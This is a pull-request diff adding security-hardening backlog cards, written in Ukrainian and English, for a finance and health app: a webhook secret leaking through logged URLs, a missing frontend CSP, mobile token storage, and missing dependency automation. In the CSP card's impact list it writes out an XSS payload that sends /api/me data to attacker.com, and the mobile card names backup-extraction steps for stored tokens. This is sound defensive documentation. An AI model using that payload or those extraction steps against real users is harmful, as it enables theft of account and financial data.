### PR TITLE
docs(security): add hardening backlog sprint 1 (C1, C2, H1, H2)

### DIFF
--- a/docs/security/README.md
+++ b/docs/security/README.md
@@ -1,6 +1,6 @@
 # Security
 
-> **Last validated:** 2026-05-02 by @claude. **Next review:** 2026-07-31.
+> **Last validated:** 2026-05-03 by @Skords-01. **Next review:** 2026-08-01.
 > **Status:** Active
 
 Security policy, vulnerability response, audits, and recovery discipline.
@@ -15,3 +15,4 @@ Security policy, vulnerability response, audits, and recovery discipline.
 | [`nightly-audit.md`](./nightly-audit.md)                         | Nightly dependency and audit triage                    |
 | [`disaster-recovery.md`](./disaster-recovery.md)                 | Disaster classes, RPO/RTO targets, restore discipline  |
 | [`vulnerability-sla.md`](./vulnerability-sla.md)                 | Response and remediation SLA                           |
+| [`hardening/`](./hardening/README.md)                            | Living security hardening backlog (per-finding cards)  |

--- a/docs/security/hardening/C1-mono-webhook-secret-in-url.md
+++ b/docs/security/hardening/C1-mono-webhook-secret-in-url.md
@@ -1,0 +1,99 @@
+# C1 — Monobank webhook secret leaks via URL path
+
+> **Last validated:** 2026-05-03 by @Skords-01. **Next review:** 2026-08-01.
+> **Status:** Open
+
+| Field             | Value                                                                                |
+| ----------------- | ------------------------------------------------------------------------------------ |
+| **Severity**      | **Critical** (CVSS 9.1 — Auth-bypass via leaked secret + replay)                    |
+| **Sprint**        | [Sprint 1](./sprint-1.md)                                                            |
+| **Owner**         | backend                                                                              |
+| **Effort**        | 1 person-day                                                                         |
+| **Status**        | Open                                                                                 |
+| **Discovered**    | 2026-05-03 (security-review by Devin)                                                |
+| **Threat model**  | Information Disclosure → Replay → Spoofing                                           |
+| **Affected files** | `apps/server/src/modules/mono/webhook.ts`, `apps/server/src/obs/logger.ts`, `apps/server/src/app.ts` |
+
+## Summary
+
+Monobank надсилає webhook-нотифікації на URL `POST /api/mono/webhook/<secret>`, де `<secret>` — довгий random, що ідентифікує користувача. Цей секрет потрапляє у **access-логи** (Railway, Express, Pino-http, Sentry breadcrumbs) як частина `req.url`, що дозволяє атакеру з read-only доступом до логів **виявити валідний секрет і спуфити транзакції**.
+
+Фікс на стороні БД (SHA-256 hash як index — `webhookSecretHash` у `mono/crypto.ts`) захищає від `WHERE`-timing-leak, але **не** захищає секрет від витоку через лог-pipeline.
+
+## Evidence
+
+```ts
+// apps/server/src/modules/mono/webhook.ts:159–190
+export async function webhookHandler(req: Request, res: Response): Promise<void> {
+  const start = process.hrtime.bigint();
+  const secret = req.params.secret;          // ← секрет із URL path
+
+  if (!secret || typeof secret !== "string") {
+    monoWebhookReceivedTotal.inc({ status: "invalid_secret" });
+    res.status(404).json({ error: "Not found" });
+    return;
+  }
+
+  const secretHash = webhookSecretHash(secret);
+  const connResult = await query<{ user_id: string }>(
+    "SELECT user_id FROM mono_connection WHERE webhook_secret_hash = $1 AND status = 'active'",
+    [secretHash],
+    { op: "mono_webhook_lookup" },
+  );
+  // ...
+```
+
+URL-форма `POST https://api.<host>/api/mono/webhook/<secret>` логуватиме secret у:
+
+- Railway access-logs (≥ 30 днів retention за замовчуванням).
+- Pino HTTP-серіалайзер (`req.url`, `req.originalUrl`).
+- Sentry breadcrumbs та `event.request.url` (для будь-якого error-event у webhook handler-і).
+- Будь-який APM / reverse-proxy / WAF, що сидить перед сервером.
+
+Поточний `redactPaths` у `apps/server/src/obs/logger.ts:24–48` редагує `cookie`, `authorization`, `password`, `email`, `phone`, але **не** `req.url` для шляху `/api/mono/webhook/*`.
+
+## Impact
+
+1. **Replay attack (high impact)** — атакер з логами реплеює `StatementItem` із підробленими `amount`/`description` для будь-якого юзера. UPSERT-idempotency `(user_id, mono_tx_id)` дозволяє додавати фальшиві транзакції з контрольованим `mono_tx_id`.
+2. **Account takeover (medium impact)** — підроблені транзакції впливають на бюджет-розрахунки в `apps/web` (Finyk модуль), що може ввести юзера в оману щодо балансу.
+3. **Compliance impact** — фінансові дані під фактичним частим контролем (подальша GDPR / fintech-compliance).
+4. **Blast radius** — кожен read-only холдер логів (Sentry, Railway, потенційний Loki) = post-hoc валідні webhook-секрети для **всіх** активних з'єднань.
+
+## Recommendation
+
+### Primary (preferred)
+
+1. **Перенести секрет у HTTP header** — `X-Mono-Webhook-Secret`. Узгодити з Monobank через `setWebHook`-API або `webhookUrl`-конфіг (Monobank підтримує кастомні headers або body-base auth).
+2. **Sanitize current logs** — додати middleware, що **переписує `req.url` на `/api/mono/webhook/[redacted]`** до того, як Pino-http лог-сериалайзер чи Sentry breadcrumb обріже URL.
+3. **Rotate всі активні webhook-секрети** після фіксу: вважати їх скомпрометованими (вони вже у логах за весь історичний період).
+
+### Secondary (defense-in-depth)
+
+- Додати `req.url`, `req.originalUrl`, `req.headers['x-mono-webhook-secret']` у `redactPaths` Pino.
+- Sentry `beforeSend(event)` — sanitize `event.request.url` для всіх `/mono/webhook/*` endpoints.
+- Додати **alarm** на `mono_webhook_received_total{status="invalid_secret"}` > 10/min — раннє виявлення сканування секретів.
+
+## Correction points
+
+| File / line                                               | Action                                                                                                                  |
+| --------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------- |
+| `apps/server/src/modules/mono/webhook.ts:159–190`         | `req.params.secret` → `req.headers['x-mono-webhook-secret']` (з backward-compat на `req.params` на час migration window). |
+| `apps/server/src/modules/mono/router.ts` (mount-point)    | Маршрут `/api/mono/webhook/:secret` → `/api/mono/webhook` (path без secret).                                            |
+| `apps/server/src/obs/logger.ts:24`                        | Розширити `redactPaths`: `"req.url"`, `"req.originalUrl"`, `"req.headers['x-mono-webhook-secret']"`.                    |
+| `apps/server/src/app.ts` Sentry init                      | `beforeSend`: `event.request.url = event.request.url?.replace(/\/api\/mono\/webhook\/[^/?]+/, '/api/mono/webhook/[redacted]')`. |
+| `apps/server/src/modules/mono/rotateSecret.ts` (new file) | CLI / admin-route для масової ротації + UI «cycle webhook secret» для юзерів.                                          |
+| `apps/server/scripts/rotate-mono-secrets.ts` (new)         | One-off script для **усіх** active connections — генерує новий secret, оновлює `mono_connection`, переєструє webhook у Mono. |
+
+## Verification
+
+1. **Unit test** — `apps/server/src/modules/mono/__tests__/webhook.test.ts`: webhook відповідає 401, якщо `X-Mono-Webhook-Secret` відсутній або не співпадає.
+2. **Integration test** — Pino-output у тесті НЕ містить значення секрету ні в `req.url`, ні в `breadcrumb.data.url`.
+3. **Production smoke** — після deploy + rotation: `grep "webhook/[^[]" railway-logs.gz` за останні 24h → empty.
+4. **Sentry sanity-check** — викликати тестовий error на webhook-handler-і → перевірити, що в Sentry-issue `request.url` редагований.
+
+## Cross-references
+
+- [docs/security/hardening/sprint-1.md](./sprint-1.md) — sprint context.
+- [docs/security/vulnerability-sla.md](../vulnerability-sla.md) — Critical = 24h acknowledge / 14d fix.
+- [docs/playbooks/rotate-secrets.md](../../playbooks/rotate-secrets.md) — порядок ротації production-секретів.
+- [docs/integrations/](../../integrations/) — Monobank integration spec (uplift `setWebHook` payload).

--- a/docs/security/hardening/C2-frontend-csp.md
+++ b/docs/security/hardening/C2-frontend-csp.md
@@ -1,0 +1,111 @@
+# C2 — Frontend SPA не має Content-Security-Policy
+
+> **Last validated:** 2026-05-03 by @Skords-01. **Next review:** 2026-08-01.
+> **Status:** Open
+
+| Field              | Value                                                                                                  |
+| ------------------ | ------------------------------------------------------------------------------------------------------ |
+| **Severity**       | **Critical** (CVSS 8.8 — Universal-XSS exfiltration vector)                                            |
+| **Sprint**         | [Sprint 1](./sprint-1.md)                                                                              |
+| **Owner**          | frontend                                                                                               |
+| **Effort**         | 0.5 person-day (Report-Only) + 1d опційно для Strict-CSP nonce-flow                                    |
+| **Status**         | Open                                                                                                   |
+| **Discovered**     | 2026-05-03                                                                                             |
+| **Threat model**   | XSS Exfiltration → Account Compromise                                                                  |
+| **Affected files** | `apps/web/vercel.json`, `vercel.json` (root), `apps/web/index.html`, `apps/server/src/http/security.ts` |
+
+## Summary
+
+`helmet.contentSecurityPolicy` додає `Content-Security-Policy` header **тільки до response-ів API**. Це коректно для JSON-API. Але SPA-фронтенд (`apps/web`) **не має жодного CSP** — ні через Vercel headers (`vercel.json`), ні через inline `<meta http-equiv="Content-Security-Policy" ...>` у `index.html`.
+
+Це означає: будь-який майбутній XSS у SPA (через залежність, через user-content рендер у `claude-tracker` chat-message-і, через misconfigured library) → повний exfiltration без жодного браузерного guard-у.
+
+## Evidence
+
+```jsonc
+// vercel.json (root) — є COOP/COEP/Permissions-Policy/X-Frame-Options, але НЕМАЄ CSP
+[
+  { "key": "Cross-Origin-Opener-Policy", "value": "same-origin" },
+  { "key": "Cross-Origin-Embedder-Policy", "value": "require-corp" },
+  { "key": "Permissions-Policy", "value": "camera=(), microphone=(), geolocation=()" },
+  { "key": "X-Frame-Options", "value": "DENY" },
+  // НЕМАЄ "Content-Security-Policy"
+]
+```
+
+```html
+<!-- apps/web/index.html — немає <meta http-equiv="Content-Security-Policy"> -->
+<meta charset="UTF-8" />
+<meta name="viewport" content="width=device-width, initial-scale=1.0" />
+<title>Sergeant</title>
+<!-- ↑ після цього рядка одразу імпортується bundle -->
+```
+
+```ts
+// apps/server/src/http/security.ts — CSP стоїть, але ТІЛЬКИ для API-response-ів
+helmet({
+  contentSecurityPolicy: { directives: { defaultSrc: ["'none'"], ... } },
+  // ...
+})
+```
+
+## Impact
+
+1. **Universal-XSS exfiltration** — `<script>fetch("/api/me").then(r=>r.json()).then(s=>fetch("https://attacker.com",{method:"POST",body:JSON.stringify(s)}))</script>` — нічого не блокує.
+2. **Sergeant обробляє фінансові дані** (Monobank, PrivatBank), персональні (вага, харчування, медичні замітки в `claude-tracker`). Без CSP `connect-src` обмеження браузер відправить будь-що куди завгодно.
+3. **CSP — найдешевший single-shot захист від XSS**, який вже передбачений архітектурою (Vercel headers).
+4. **Defense-in-depth gap** — навіть з добре написаним React-кодом, малий compromised dependency у вузькому supply-chain (наприклад, react-charting-library з 50K downloads/тиждень) запатчить себе у production без виявлення.
+
+## Recommendation
+
+### Phase 1 — CSP Report-Only (1–2 тижні)
+
+Додати **`Content-Security-Policy-Report-Only`** з мінімально-обмежуючим policy-ом. Збирати reports через `report-uri` → `/api/csp-report` endpoint на сервері (вже існує — перевірити). Після стабілізації false-positive-ів (PostHog session-recording, Sentry trace, Vercel Analytics) → перейти у **enforce-mode**.
+
+```json
+{
+  "key": "Content-Security-Policy-Report-Only",
+  "value": "default-src 'self'; script-src 'self' 'wasm-unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: blob: https:; font-src 'self' data:; connect-src 'self' https://api.<your-host> https://*.posthog.com https://*.ingest.sentry.io; frame-ancestors 'none'; base-uri 'none'; form-action 'self'; object-src 'none'; upgrade-insecure-requests; report-uri /api/csp-report"
+}
+```
+
+### Phase 2 — Enforce + nonce (опційно)
+
+- Викинути `'unsafe-inline'` для `style-src` після перевірки реальних source-map / Tailwind generated styles.
+- Якщо Vite produces inline `<script>` blocks — додати `nonce` через build-time inject.
+- Перевірити COEP-сумісність із Stripe/Google-Maps/PostHog session iframes.
+
+### Defense-in-depth: meta-fallback
+
+- Додати `<meta http-equiv="Content-Security-Policy" ...>` в `apps/web/index.html` як **fallback**, якщо Vercel headers не доїхали (rare edge-case).
+
+## Correction points
+
+| File                                                                | Action                                                                                                                                     |
+| ------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------ |
+| `apps/web/vercel.json` (або root `vercel.json` — див. [H7](./README.md)) | Додати `Content-Security-Policy-Report-Only` header (Report-Only spec вище).                                                              |
+| `apps/web/index.html:39–42`                                         | Додати fallback `<meta http-equiv="Content-Security-Policy" content="..." />` (нижчий пріоритет за Vercel headers, але страхує).         |
+| `apps/server/src/modules/csp-report/router.ts` (новий або existing) | Перевірити, що `/api/csp-report` приймає JSON body, валідує, rate-limit-ить, і логує у `csp_violation_total{directive=...}` метрику.         |
+| `apps/web/public/.well-known/csp-violations` (тимчасовий)            | Додатковий sink для legacy reporters (можна skip-нути, якщо Sentry приймає `Reporting-API`).                                                 |
+| `apps/server/src/http/security.ts`                                  | Якщо CSP_DISABLE / CSP_REPORT_ONLY env-flags використовуються — синхронізувати поведінку server-side helmet з frontend (див. [M1](./README.md)). |
+
+## Verification
+
+1. **CSP report endpoint smoke** — дати CSP-report curl-ом, переконатись, що він записується у метрику.
+2. **Production canary** — деплой Report-Only mode → 24h моніторинг `csp_violation_total` → корекція allowlist.
+3. **Browser DevTools** — Network tab → Response Headers → `Content-Security-Policy-Report-Only: ...` присутній на root-route і на assets.
+4. **Penetration test (manual)** — спробувати inject inline `<script>alert(1)</script>` через chat-message render або через `?next=...` deeplink → CSP-report має фіксувати спробу.
+
+## Open questions
+
+- Чи **PostHog session-recording** компатибельний з `script-src 'self'`? Перевірити docs (deprecated COEP-вимоги).
+- Чи **Stripe** використовується в frontend? Якщо так — `connect-src https://api.stripe.com https://m.stripe.com`, `frame-src https://js.stripe.com`, `script-src https://js.stripe.com`.
+- Чи **Sentry session-replay** activated? Якщо так — окремі CSP-вимоги.
+- Чи `'unsafe-eval'` потрібен для якоїсь wasm-залежності (Sentry profiling, image-codec, …)?
+
+## Cross-references
+
+- [docs/security/hardening/sprint-1.md](./sprint-1.md) — sprint context.
+- [docs/security/hardening/C1-mono-webhook-secret-in-url.md](./C1-mono-webhook-secret-in-url.md) — обидві Critical.
+- [MDN: CSP](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) — reference policy syntax.
+- [OWASP Cheat Sheet: Content Security Policy](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html).

--- a/docs/security/hardening/H1-mobile-bearer-storage.md
+++ b/docs/security/hardening/H1-mobile-bearer-storage.md
@@ -1,0 +1,103 @@
+# H1 — Bearer token у мобільному shell без явного Keychain-accessibility
+
+> **Last validated:** 2026-05-03 by @Skords-01. **Next review:** 2026-08-01.
+> **Status:** Open
+
+| Field              | Value                                                                                              |
+| ------------------ | -------------------------------------------------------------------------------------------------- |
+| **Severity**       | **High** (CVSS 7.4 — Mobile credential leakage via cross-device sync)                              |
+| **Sprint**         | [Sprint 1](./sprint-1.md)                                                                          |
+| **Owner**          | mobile                                                                                             |
+| **Effort**         | 0.5 person-day                                                                                     |
+| **Status**         | Open                                                                                               |
+| **Discovered**     | 2026-05-03                                                                                         |
+| **Threat model**   | Information Disclosure → Account Takeover                                                          |
+| **Affected files** | `apps/mobile-shell/src/auth-storage.ts`, `apps/mobile-shell/capacitor.config.ts`, `AndroidManifest.xml` |
+
+## Summary
+
+Bearer-token у `apps/mobile-shell` зберігається через `@capacitor/preferences` без явного `accessibility: kSecAttrAccessibleWhenUnlockedThisDeviceOnly`. На iOS це означає Keychain з default-accessibility `kSecAttrAccessibleAfterFirstUnlock`, що дозволяє:
+
+1. **iCloud Keychain sync** — токен синхронізується на всі девайси з тим самим AppleID.
+2. **iOS device-backup** — токен потрапляє у iTunes/Finder backup без passcode і витягається тулзами типу iMazing.
+3. На Android — `EncryptedSharedPreferences` (API 23+), але `android:allowBackup` за замовчуванням `true` → `adb backup` витягає shared_prefs.
+
+Bearer-token має lifetime **30 днів** (Better Auth default), тому витік = повний доступ на місяць.
+
+## Evidence
+
+```ts
+// apps/mobile-shell/src/auth-storage.ts:30–45
+import { Preferences } from "@capacitor/preferences";
+
+const BEARER_KEY = "auth.bearer";
+
+export async function getBearerToken(): Promise<string | null> {
+  const { value } = await Preferences.get({ key: BEARER_KEY });
+  return value ?? null;
+}
+
+export async function setBearerToken(token: string): Promise<void> {
+  await Preferences.set({ key: BEARER_KEY, value: token });
+  // ↑ Немає { accessibility: 'AfterFirstUnlockThisDeviceOnly' }
+  // ↑ Немає захисту від iCloud-sync
+}
+```
+
+```ts
+// apps/server/src/auth.ts:104–115
+session: {
+  expiresIn: 60 * 60 * 24 * 30,   // 30 days bearer lifetime
+  updateAge: 60 * 60 * 24,
+  cookieCache: { enabled: true, maxAge: 5 * 60 },
+}
+```
+
+## Impact
+
+1. **Cross-device leakage** — викрадений MacBook з iCloud Keychain unlock → bearer-token доступний → 30 днів повного доступу до Sergeant без знання пароля юзера.
+2. **Forensic backup recovery** — `iMazing`/`iExplorer` витягують Keychain з iTunes-backup на seized iPhone → bearer.
+3. **Android cloud-backup** — `adb backup -shared <com.sergeant.app>` (debug-mode device) витягає `shared_prefs/CapacitorStorage.xml`.
+4. **Multi-account abuse** — якщо attack-vector — це partner-after-breakup сценарій (shared AppleID), iCloud-sync дає cross-device токен без явного opt-in.
+
+## Recommendation
+
+### Primary
+
+1. **iOS — explicit accessibility**: мігрувати на `@capacitor-community/secure-storage-plugin` або `@capacitor/secure-storage` (якщо існує) з явним `kSecAttrAccessibleWhenUnlockedThisDeviceOnly` + `kSecAttrSynchronizable: false`.
+2. **Android — disable backup**: `android:allowBackup="false"` АБО `android:dataExtractionRules` (API 31+) з `<exclude domain="sharedpref" path="CapacitorStorage.xml"/>`.
+3. **Скоротити TTL bearer-tokenа до 7 днів** + rotation-on-use (Better Auth підтримує rolling refresh).
+
+### Secondary (defense-in-depth)
+
+- Додати **device-binding**: при login виставляти `device_id` (UUID, генерований раз і збережений у secure-storage), при `bearer auth` валідувати у БД.
+- Розглянути перехід на **OAuth refresh-token flow** замість long-lived bearer (refresh-token = 30d, access-token = 15min, обидва store у secure-storage).
+- На server-side, додати **`User-Agent` + `IP-prefix`-fingerprint** при першому use bearer-у; при сильному drift — forced re-auth (див. [H3](./README.md)).
+
+## Correction points
+
+| File / line                                                                      | Action                                                                                                          |
+| -------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------- |
+| `apps/mobile-shell/src/auth-storage.ts:39`                                       | Виставити `accessibility: 'AfterFirstUnlockThisDeviceOnly'` АБО мігрувати на `@capacitor-community/secure-storage-plugin`. |
+| `apps/mobile-shell/android/app/src/main/AndroidManifest.xml`                     | `android:allowBackup="false"` + `android:dataExtractionRules="@xml/data_extraction_rules"` (API 31+).            |
+| `apps/mobile-shell/android/app/src/main/res/xml/data_extraction_rules.xml` (new) | `<data-extraction-rules>` з `exclude domain="sharedpref"` для CapacitorStorage.                                  |
+| `apps/mobile-shell/ios/App/App/Info.plist`                                       | Перевірити `<key>NSAllowsArbitraryLoads</key><false/>` (cleartext-fallback).                                     |
+| `apps/server/src/auth.ts:104`                                                    | `expiresIn: 7 * 24 * 60 * 60` для bearer (короткий TTL + rolling refresh).                                       |
+| `apps/server/src/auth.ts:databaseHooks.session.create.before`                    | Зберігати `userAgent` + `ipPrefix` для device-binding (див. [H3](./README.md)).                                   |
+
+## Verification
+
+1. **Unit test** — `getBearerToken()` / `setBearerToken()` пишуть з правильним accessibility (mock Capacitor + assert call args).
+2. **Manual cross-device test**:
+   - iPhone-A: install + login + увімкнути iCloud Keychain backup.
+   - iPhone-B: same AppleID, install Sergeant → перевірити, що bearer **НЕ** прийшов через iCloud → юзер мусить логінитись наново.
+3. **Android backup-extraction test** — `adb backup -shared com.sergeant.app` → відкрити `shared_prefs/` → bearer **відсутній**.
+4. **TTL test** — створити сесію → перемотати system clock на 8 днів → `req.user` = null (bearer expired).
+
+## Cross-references
+
+- [docs/security/hardening/sprint-1.md](./sprint-1.md) — sprint context.
+- [docs/security/hardening/H3-session-revoke.md](./README.md) (Sprint 2) — TTL + revoke-on-password-change.
+- [docs/mobile/shell.md](../../mobile/shell.md) — Capacitor shell architecture.
+- [Capacitor Preferences docs](https://capacitorjs.com/docs/apis/preferences) — accessibility-параметри.
+- [Apple: kSecAttrAccessible](https://developer.apple.com/documentation/security/ksecattraccessible) — iOS Keychain accessibility constants.

--- a/docs/security/hardening/H2-dependabot.md
+++ b/docs/security/hardening/H2-dependabot.md
@@ -1,0 +1,178 @@
+# H2 — Немає Dependabot / Renovate (відсутність авто-оновлень залежностей)
+
+> **Last validated:** 2026-05-03 by @Skords-01. **Next review:** 2026-08-01.
+> **Status:** Open
+
+| Field              | Value                                                                                                       |
+| ------------------ | ----------------------------------------------------------------------------------------------------------- |
+| **Severity**       | **High** (CVSS 7.0 — Supply-chain MTTR window)                                                              |
+| **Sprint**         | [Sprint 1](./sprint-1.md)                                                                                   |
+| **Owner**          | devops                                                                                                      |
+| **Effort**         | 0.5 hour (config) + ~2h на review першого batch-у PR                                                        |
+| **Status**         | Open                                                                                                        |
+| **Discovered**     | 2026-05-03                                                                                                  |
+| **Threat model**   | Supply Chain → Tampering / Information Disclosure                                                           |
+| **Affected files** | `.github/dependabot.yml` (відсутній), `.github/workflows/nightly-audit.yml`, `package.json:overrides`        |
+
+## Summary
+
+Репо має сильну **реактивну** CI: `nightly-audit.yml` відкриває GitHub-issue при critical/high у `pnpm audit` + OSV-Scanner. Але немає **автоматичних PR**, які б оновлювали уразливу залежність — людська реакція на issue займає days-to-weeks. За цей час експлойти вже у дикому світі.
+
+`package.json:overrides` уже містить ручні pin-и для `tar`, `xmldom`, `serialize-javascript`, `postcss`, `uuid` — це означає, що команда вже **вручну** робила exception-and-pin для CVE. Кожен такий випадок — час, який автоматизація зекономила б.
+
+## Evidence
+
+```bash
+$ ls .github/dependabot.yml .github/renovate.json renovate.json
+ls: cannot access '.github/dependabot.yml': No such file or directory
+ls: cannot access '.github/renovate.json': No such file or directory
+ls: cannot access 'renovate.json': No such file or directory
+```
+
+```jsonc
+// package.json — manual overrides, що замінюють Dependabot
+{
+  "overrides": {
+    "tar": ">=6.2.1",
+    "xmldom": "npm:@xmldom/xmldom@^0.8.10",
+    "serialize-javascript": ">=6.0.2",
+    "postcss": ">=8.4.31",
+    "uuid": ">=14.0.0"  // ← див. L1 (можливо, нерезольвиться)
+  }
+}
+```
+
+```yaml
+# .github/workflows/nightly-audit.yml — реактивний, не proactive
+on:
+  schedule:
+    - cron: "0 6 * * *"
+# ↑ робить тільки issue, не PR
+```
+
+## Impact
+
+1. **MTTR (Mean Time To Remediation) — дні-тижні**. Від CVE-disclosure до merged-fix: nightly-audit (24h) → issue triage (1–3d) → manual `pnpm update <pkg>` + lockfile review (1d) → PR review + merge (1–2d) = total **3–7 днів**.
+2. **Transitive deps gap** — `pnpm-lock.yaml` має сотні транзитивних залежностей. CVE на будь-якій з них залишається невідомим до nightly-audit-у.
+3. **Team-toil** — ручне `pnpm update` для кожного нового CVE забирає dev-time, який можна автоматизувати.
+4. **GitHub Actions / Docker base images** — без оновлень Actions і `node:20-alpine` версій, security-pinned actions старіють і втрачають CVE-fixes.
+
+## Recommendation
+
+Додати `.github/dependabot.yml` з трьома ecosystem-ами (npm, github-actions, docker) і grouping-стратегією для зменшення PR-noise:
+
+```yaml
+# .github/dependabot.yml
+version: 2
+updates:
+  - package-ecosystem: "npm"
+    directory: "/"
+    schedule:
+      interval: "weekly"
+    open-pull-requests-limit: 10
+    versioning-strategy: "increase"
+    groups:
+      production-deps:
+        dependency-type: "production"
+        update-types: ["minor", "patch"]
+      dev-deps:
+        dependency-type: "development"
+      security:
+        applies-to: security-updates
+    ignore:
+      # Manual pins handled via package.json overrides — leave these alone.
+      - dependency-name: "uuid"
+      - dependency-name: "tar"
+      - dependency-name: "xmldom"
+      - dependency-name: "serialize-javascript"
+      - dependency-name: "postcss"
+    labels:
+      - "dependencies"
+      - "automerge-eligible"
+
+  - package-ecosystem: "github-actions"
+    directory: "/"
+    schedule:
+      interval: "weekly"
+    labels:
+      - "dependencies"
+      - "ci"
+
+  - package-ecosystem: "docker"
+    directory: "/"  # uses Dockerfile.api
+    schedule:
+      interval: "weekly"
+    labels:
+      - "dependencies"
+      - "docker"
+```
+
+### Auto-merge для security-updates
+
+Додати workflow `.github/workflows/dependabot-automerge.yml`, що auto-merge-ить **patch-only** security-updates після зеленого CI:
+
+```yaml
+name: Dependabot Auto-Merge
+on: pull_request_target
+permissions:
+  contents: write
+  pull-requests: write
+jobs:
+  auto-merge:
+    if: github.actor == 'dependabot[bot]'
+    runs-on: ubuntu-latest
+    steps:
+      - uses: dependabot/fetch-metadata@<sha>
+        id: meta
+      - if: steps.meta.outputs.update-type == 'version-update:semver-patch' && steps.meta.outputs.dependency-type == 'direct:production' && contains(steps.meta.outputs.package-ecosystem, 'npm')
+        run: gh pr merge --auto --squash "$PR_URL"
+        env:
+          PR_URL: ${{ github.event.pull_request.html_url }}
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+```
+
+### Альтернатива: Renovate
+
+Якщо хочемо більш гранулярного контролю (group-by-package, package-rules з prefixed labels):
+
+```jsonc
+// renovate.json
+{
+  "extends": ["config:recommended", ":semanticCommits", ":automergePatch"],
+  "schedule": ["before 6am on monday"],
+  "labels": ["dependencies"],
+  "packageRules": [
+    {
+      "matchUpdateTypes": ["patch"],
+      "matchCurrentVersion": "!/^0/",
+      "automerge": true
+    }
+  ]
+}
+```
+
+## Correction points
+
+| File                                                | Action                                                                                                |
+| --------------------------------------------------- | ----------------------------------------------------------------------------------------------------- |
+| `.github/dependabot.yml` (new)                      | Створити (повний спек вище).                                                                          |
+| `.github/workflows/dependabot-automerge.yml` (new)  | Auto-merge patch-only security-updates після зеленого CI.                                             |
+| `.github/labels.yml` (якщо існує)                   | Додати labels: `dependencies`, `security`, `automerge-eligible`, `ci`, `docker`.                       |
+| GitHub repo settings → Code security                | Увімкнути `dependabot-alerts` + `secret-scanning` + `secret-scanning-push-protection` (див. [I2](./README.md)). |
+| `docs/security/audit-exceptions.md`                 | Перевірити, що manual-pin-и (uuid, tar, postcss, xmldom, serialize-javascript) задокументовані як exceptions. |
+
+## Verification
+
+1. **Static check** — `actionlint .github/dependabot.yml` пройшов.
+2. **Manual trigger** — після merge `dependabot.yml` → у Settings → Dependabot → "Last updated" = свіжо.
+3. **First batch** — Dependabot створив perший batch PR протягом 7 днів (перевірити Dependabot dashboard).
+4. **Auto-merge test** — підготувати штучний PR з patch-only-update → CI зелений → auto-merge спрацював.
+5. **Audit-trail** — кожен Dependabot-PR має правильні labels.
+
+## Cross-references
+
+- [docs/security/hardening/sprint-1.md](./sprint-1.md) — sprint context.
+- [docs/security/audit-exceptions.md](../audit-exceptions.md) — manual-pin-и (overrides у `package.json`).
+- [docs/security/nightly-audit.md](../nightly-audit.md) — реактивна частина (стає supplementary).
+- [docs/security/vulnerability-sla.md](../vulnerability-sla.md) — SLA на оновлення.
+- [GitHub Docs: Dependabot configuration](https://docs.github.com/en/code-security/dependabot/dependabot-version-updates/configuration-options-for-the-dependabot.yml-file).

--- a/docs/security/hardening/README.md
+++ b/docs/security/hardening/README.md
@@ -1,0 +1,83 @@
+# Security Hardening Backlog
+
+> **Last validated:** 2026-05-03 by @Skords-01. **Next review:** 2026-08-01.
+> **Status:** Active
+
+Беклог посилення безпеки (security hardening) — структурований список знахідок із внутрішнього security-review від 2026-05-03. Кожна знахідка живе у власному файлі-картці (`<id>-<slug>.md`), згрупована у спринти за пріоритетом усунення.
+
+Це **не** аудит у класичному сенсі (як файли у `docs/audits/`) — це **робочий беклог**: кожна картка має `Status` (`Open` / `In progress` / `Closed`), власника та точку виправлення. Закрита картка лишається як historical record і не видаляється.
+
+## Чому це не «audit»
+
+| Папка                                    | Призначення                                                                                                  |
+| ---------------------------------------- | ------------------------------------------------------------------------------------------------------------ |
+| `docs/audits/`                           | Snapshot-аудити в момент часу (UX, doc-hygiene, comprehensive). Закриваються одним «implementation-roadmap». |
+| `docs/security/hardening/` (**цей док**) | Living беклог security-знахідок. Одна знахідка = одна картка. Картки переходять `Open → Closed` поступово.   |
+| `docs/security/`                         | Канонічні security-політики (access policy, vulnerability SLA, disaster recovery). Не беклог.                |
+
+Якщо в майбутньому з'явиться повторний security-review — він додає нові картки сюди (з incremental id-ами, наприклад `C3-...`, `H10-...`), а не створює окремий audit-файл.
+
+## Зведений рейтинг (54 знахідки)
+
+| Severity                  | Кількість |
+| ------------------------- | --------- |
+| Critical                  | 2         |
+| High                      | 9         |
+| Medium                    | 21        |
+| Low                       | 14        |
+| Informational / hardening | 8         |
+
+## Spring roadmap
+
+| Sprint                                   | Що закриваємо                              | Effort  |
+| ---------------------------------------- | ------------------------------------------ | ------- |
+| [Sprint 1](./sprint-1.md) — 1–2 тижні    | C1, C2, H1, H2                             | ~2.5d   |
+| [Sprint 2](./sprint-2.md) — тиждень 3–4  | H3, H5, H6, H7, H8, H9, M1, M3             | ~5d     |
+| [Sprint 3](./sprint-3.md) — місяць 2     | I1 (CodeQL), I2, M4–M21 batched            | ~7d     |
+| [Sprint 4](./sprint-4.md) — місяць 2.5–3 | L1–L14 cleanup, I3 (SBOM), I6 threat-model | ~5d     |
+
+Окремі sprint-overview-файли (`sprint-N.md`) тримають narrative-опис, чому саме ці картки разом, що міряємо як «success», та залежності між картками.
+
+## Картки за severity
+
+### Critical
+
+| ID                                                      | Title                                          | Status | Sprint                |
+| ------------------------------------------------------- | ---------------------------------------------- | ------ | --------------------- |
+| [C1](./C1-mono-webhook-secret-in-url.md)                | Monobank webhook secret leaks via URL path     | Open   | [Sprint 1](./sprint-1.md) |
+| [C2](./C2-frontend-csp.md)                              | Frontend SPA не має Content-Security-Policy   | Open   | [Sprint 1](./sprint-1.md) |
+
+### High
+
+| ID                                                      | Title                                                     | Status | Sprint                    |
+| ------------------------------------------------------- | --------------------------------------------------------- | ------ | ------------------------- |
+| [H1](./H1-mobile-bearer-storage.md)                     | Bearer token у мобільному shell без явного Keychain-AC    | Open   | [Sprint 1](./sprint-1.md) |
+| [H2](./H2-dependabot.md)                                | Немає Dependabot / Renovate                               | Open   | [Sprint 1](./sprint-1.md) |
+| H3 — `H3-session-revoke.md` (Sprint 2)                  | Сесія 30d без revoke-on-password-change і device-binding  | Open   | Sprint 2                  |
+| H4 — `H4-token-key-rotation.md` (Sprint 2/3)            | Немає сценарію ротації `*_TOKEN_ENC_KEY`                  | Open   | Sprint 2                  |
